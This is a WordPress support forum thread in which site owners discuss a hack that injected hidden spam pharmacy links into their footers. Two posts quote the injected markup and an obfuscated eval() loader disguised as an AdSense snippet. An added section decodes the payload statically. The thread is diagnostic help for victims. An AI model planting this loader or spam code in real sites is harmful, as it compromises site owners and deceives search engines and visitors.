WP hacked, Ads added to Google cache (8 posts)

  1. stml
    Member
    Posted 5 years ago #

    I just discovered that the Google result for my site http://londonlitplus.com includes hidden spam that is not visible to regular browsing.

    It appears to be added in with the wp_footer() anchor, and as I'm not using this, I've removed it from my theme, which will hopefully stop it immediately (only becoming effective when Google recaches my site though), but I'm assuming it's still there in my core files (I'm using only a couple of reputable plugins).

    I did try spoofing my site with a Googlebot user-agent, which, while definitely working, did not show up the spam.

    I upgraded all my core files to 2.5.1 only a few weeks ago, so I'm assuming this has happened since then, although I can't be sure. I can't find where it's coming from, but I'd sure like to.

    I've found references to this problem elsewhere, although the hole - files chmodded to 777 - is not the problem here.

    Has anyone else experienced this? Is there a known problem and/or solution?

    This is what was being added in my footer:

    <div id="_wp_footer"><a href="http://www.foresight.org/nanodot/?res=0" title="Acyclovir">Acyclovir</a>
    <a href="http://www.foresight.org/nanodot/?res=1" title="Adderall">Adderall</a>
    ... Many more similar ...
    <a href="http://www.foresight.org/nanodot/?res=97" title="Brahmi">Brahmi</a>
    <a href="http://www.foresight.org/nanodot/?res=98" title="Brite">Brite</a>
    <a href="http://www.foresight.org/nanodot/?res=99" title="Buspar">Buspar</a>
    </div>
    <script type="text/javascript"><!--
    google_ad_client = "pub-7652328300112263";
    google_ad_width = 728;
    google_ad_height = 15;
    google_ad_format = "728x15_0ads_al_s";
    google_ad_channel = "";
    function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}
    google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02373B44403B2F4609ED3838362CE800");
    //-->
    </script>
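
What the `google_ads()` call quoted in this thread evaluates can be read without running it. The following is an added example, not part of any poster's message: it repeats the posted decoding loop but returns the text instead of passing it to `eval()`; the function names `decodeGoogleAdsArg` and `findHiddenPayloads` are made up for this illustration.

```javascript
// Added example: static decoder for the google_ads() obfuscation quoted in the thread.
// Nothing is eval()'d; the decoded text is returned as a string for inspection.

// Decode the hex run after '?': character k (1-based) is stored as (char - k) mod 256.
function decodeGoogleAdsArg(arg) {
  const q = arg.indexOf('?');
  if (q === -1) return null; // no payload: the posted function returns the URL unchanged
  const hex = arg.slice(q + 1);
  if (hex.length % 2 !== 0 || !/^[0-9a-fA-F]*$/.test(hex)) {
    throw new Error('payload is not an even-length hex string');
  }
  let out = '';
  for (let pos = 0, k = 1; pos < hex.length; pos += 2, k++) {
    const byte = parseInt(hex.slice(pos, pos + 2), 16);
    out += String.fromCharCode((byte + k) % 256);
  }
  return out;
}

// Find every google_ads("...") call in captured page source and decode its argument.
// The function definition itself is skipped because its argument is not a string literal.
function findHiddenPayloads(html) {
  const calls = /google_ads\(\s*(["'])(.*?)\1\s*\)/g;
  const found = [];
  for (const m of html.matchAll(calls)) {
    const decoded = decodeGoogleAdsArg(m[2]);
    if (decoded !== null) found.push(decoded);
  }
  return found;
}

// Sample input: the call exactly as quoted in the posts (hex string split for line length).
const SAMPLE = 'google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?' +
  '636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C' +
  '50423A02373B44403B2F4609ED3838362CE800");';

console.log(findHiddenPayloads(SAMPLE));
```

The decoded statement sets `display` to `"none"` on the `_wp_footer` div, so a browser that runs the script does not render the injected links while they remain in the page source.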
  2. bastienb
    Member
    Posted 5 years ago #

    Hi,
    I just encountered the same thing. Here is what I have in the Google cache:

    <div id="_wp_footer">
    ...
    
    A lot of links to get your cock longer and stronger...
    
    ...
    </div>
    
    <script type="text/javascript"><!--
    google_ad_client = "pub-7652328300112263";
    google_ad_width = 728;
    google_ad_height = 15;
    google_ad_format = "728x15_0ads_al_s";
    google_ad_channel = "";
    function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}
    google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02373B44403B2F4609ED3838362CE800");
    //-->
    </script>

    I saw the same call to the function wp_footer(); at the end of all the footer.php files hosted in the wp-content directory, but I don't have this call in my local saves, so I believe it has been modified on the server side.

    This is the second time I have had this problem; last time I was banned from Google for spam reasons. This time, I saw it before the ban because of my stats (all Google referrers were redirected to spam sites).

    I'm sure that this is a WordPress problem; my server is safe, it does not have any HTTP access to external web sites, so I'm sure this hack has been done by injection!

    I'm using WP 2.5.1 and 3 plugins updates (cformsII, WP-polls and Akismet).

    Actually, I have deleted all default themes from the wp-content directory, left only the one I use and made it read-only, but I don't think this is the only solution.

    Please answer us, it could help.

    Regards,
    Bastien.

  3. Joni
    Member
    Posted 5 years ago #

    That sounds like a spammy *theme* to me, both of you guys. And rest assured, it is NOT the default theme that is stinking up the pond. Can each of you tell me what theme you were using when this spam appeared?

  4. bastienb
    Member
    Posted 5 years ago #

    I'm using a theme from Abhishek Tripathi; the theme name is YourBlog2.0. I made a lot of changes to it, but I don't think the theme is the problem.

    You can see it here: http://www.culture-generale.fr

    Should the wp_footer() function be in the default WP themes?

  5. Joni
    Member
    Posted 5 years ago #

    Look in the theme files and see if there is a file called functions.php and see if it calls wp_footer() .. which is a legitimate function most of the time, except when unscrupulous theme designers insert spam into the mix.

  6. stml
    Member
    Posted 5 years ago #

    wp_footer() is completely legitimate. I was using a custom theme, but always leave wp_footer() in in case it is required at some point.

    While it wasn't in this case, and I could remove it, the problem is not with wp_footer() but the malicious code that was being inserted by it, and working out where this code is, and how it got there, is the primary concern.

  7. stml
    Member
    Posted 5 years ago #

    To clarify, this has nothing to do with the theme in use.

  8. bastienb
    Member
    Posted 5 years ago #

    Hi stml,

    I have searched for information about this hack and I found something interesting about the way we have been infected.

    This is not related at all to the theme used as everyone says here, but it's an old exploit of WP that maybe we have always had in our files and databases since the migrations!

    See the article here: http://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/

    I have seen and deleted everything the author mentions and I think I'm safe now!

    Regards,
    Bastien.

Topic Closed

This topic has been closed to new replies.
